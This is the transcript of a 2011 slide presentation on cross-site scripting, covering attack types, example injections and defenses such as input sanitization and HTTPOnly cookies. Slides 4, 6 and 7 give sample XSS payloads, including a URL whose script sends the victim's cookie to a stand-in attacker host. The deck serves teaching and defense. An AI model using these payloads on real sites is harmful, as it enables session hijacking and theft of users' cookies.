1 / 15

Cross Site Scripting (XSS)

Cross Site Scripting (XSS). Ashish Dhital 21 st April 2011. XSS: Background. Web sites are ubiquitous today Immense popularity brings variety of attacks Mostly SQL Injection, DoS , XSS XSS introduction, types, defense and conclusion. XSS: Introduction.

claude
Download Presentation

Cross Site Scripting (XSS)

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Cross Site Scripting (XSS) AshishDhital 21st April 2011

  2. XSS: Background • Web sites are ubiquitous today • Immense popularity brings variety of attacks • Mostly SQL Injection, DoS, XSS • XSS introduction, types, defense and conclusion

  3. XSS: Introduction • XSS exploits websites by inserting malicious client side scripts in dynamic websites • Making use of browser’s vulnerabilities Bypassing same origin policy enforced by browser • Exploitation of HTML, JS, VBScript, ActiveX • Objective – session hijacking, redirection, stealing information • 80% of Attacks against Websites today • In 2010, various XSS vulnerabilities were found in Amazon, eBay, PayPal, American Express • McAfee’s site has been shown to have XSS vulnerabilities (as of March 2011)

  4. XSS: Script Insertion • Examples of Insertion of Scripts in HTML tags <BODY ONLOAD =alert (“evilmessage”) /> <IMG SR =”Javascript: alert (“evilmessage”) /> <LINK REL=”STYLESHEET” HREF=”Javscript.alert (“evilmessage”) /> • Flash Exploitation <EMBED SRC= http://dangeroussite.com/evilflash.swf “ AllowScriptAccess=”always” />

  5. XSS: Types • DOM Based Attack • Reflected / Non- persistent Attack • Stored/ Persistent Attack

  6. XSS: DOM Based Attack • Exploitation of DOM Entities document. Location, document.URL, and document.referer properties • Payload in the URL sent to unsuspecting users http://www.genuinewebsite.com/getAC.php?username=<script>alert (“harmful script”) </script> • Unexpected/Undesired execution of client-side script

  7. XSS: Reflected/ Non-Persistent • Most common form of XSS attack • Data provided by web-client is immediately used by web-server to relay back a resulting page • Confirmation, Error , Search queries • Usually a malicious link provided by social engineering techniques Ex. http://www.genuinesite.com/getAc.php?username=<script>document.location='http://attackersite.ample/cgibin/stolencookie.cgi?'+document.cookie)</script>

  8. XSS: Stored/ Persistent • Most powerful one in terms of the possible damage • Inserting a malicious code into a form or input field which is stored in the server • Could infect other users, web-server, propagate rapidly • Example: The attacker inserts a script as a blog post (Of course the input text is not filtered or sanitized). A user who visits the site later clicks on the blog post. And, the script executes! Possible worm?

  9. XSS: Defense and Prevention • User Input Validation / Sanitization, Parameter Verification • Careful Checking HTTP Request to HTML Output • Filtering out unnecessary characters using regular expression Example: Filtering out anything that starts with <script>

  10. XSS: Defense and Prevention • Data verification for various properties of HTML tags like attribute, style, width • Cookies Protection Cookie – holds information about the surfer IP Address Verification ( Effective for Proxy Server ? ) HTTPOnly Flag Possible Solution – Triple DES Encryption

  11. XSS: Defense and Prevention • Available Tools to Minimize XSS attack Noxes : Windows based firewall Configuration for browser based connections Samurai XJs

  12. XSS: Defense and Prevention • How can a user defend oneself from XSS attacks? Disabling script when not required. Avoid clicking on unknown sites, URLs, or message boards. Accessing a site through its own address and not through third-party sites. Keeping oneself updated about sites and message boards that have been blacklisted as malicious sites.

  13. XSS: Conclusion • Preventive Steps May work for vulnerabilities known today • Hackers are always at work to discover zero day vulnerabilities • Web Development team should constantly update themselves • Security is an ongoing process!

  14. XSS: References • Bodmer, Fabrice. Cross-Site Scripting (XSS). Tech. Computer and Network Security Seminar. Web. 12 Apr. 2011. <http://diuf.unifr.ch/drupal/tns/sites/diuf.unifr.ch.drupal.tns/files/Teaching/2006_2007/Computer_Security_Threats_and_Counter_Measures/Bodmer_CrossSiteScripting.pdf>. • Kirda, Engin, Christopher Kruegel, Giovanni Vigna, and NenadJovanovic. Noxes: A Client-Side Solution for Mitigating Cross-Site Scripting Attacks. Noxes: A Client-Side Solution for Mitigating Cross-Site Scripting Attacks. Web. 12 Apr. 2011. <http://www.cs.ucsb.edu/~vigna/publications/2006_kirda_kruegel_vigna_jovanovic_SAC.pdf>. • Mohammadi, S., and FarhadKoohbor. Protecting Cookies against Cross-site Scripting Attacks Using Cryptography. Http://www.wseas.us. Web. 12 Apr. 2011. <http://www.wseas.us/e-library/conferences/2010/Merida/ISPACT/ISPACT-02.pdf>. • Sharma, Anand. "Prevent a Cross-Site Scripting Attack." IBM - United States. IBM, 03 Feb. 2004. Web. 12 Apr. 2011. <http://www.ibm.com/developerworks/web/library/wa-secxss/>. • Cross-site Scripting (XSS) - OWASP." OWASP (Open Web Application Security Project). Fortify Software, 10 Oct. 2010. Web. 16 Apr. 2011. <https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)>. • "Cross-site Scripting." Wikipedia, the Free Encyclopedia. Web. 17 Apr. 2011. <http://en.wikipedia.org/wiki/Cross-site_scripting>. • XSSed | Cross Site Scripting (XSS) Attacks Information and Archive. Web. 17 Apr. 2011. <http://www.xssed.com/>.

  15. XSS : Questions/Comments ?

More Related